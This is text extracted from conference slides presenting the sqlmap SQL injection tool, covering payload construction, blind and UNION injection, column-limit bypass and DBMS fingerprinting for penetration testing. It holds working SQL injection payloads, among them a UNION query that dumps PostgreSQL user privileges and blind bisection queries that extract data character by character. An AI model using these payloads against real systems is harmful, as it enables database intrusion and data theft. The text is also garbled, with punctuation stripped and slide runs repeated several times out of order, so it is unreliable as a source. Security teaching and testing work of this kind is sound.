Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
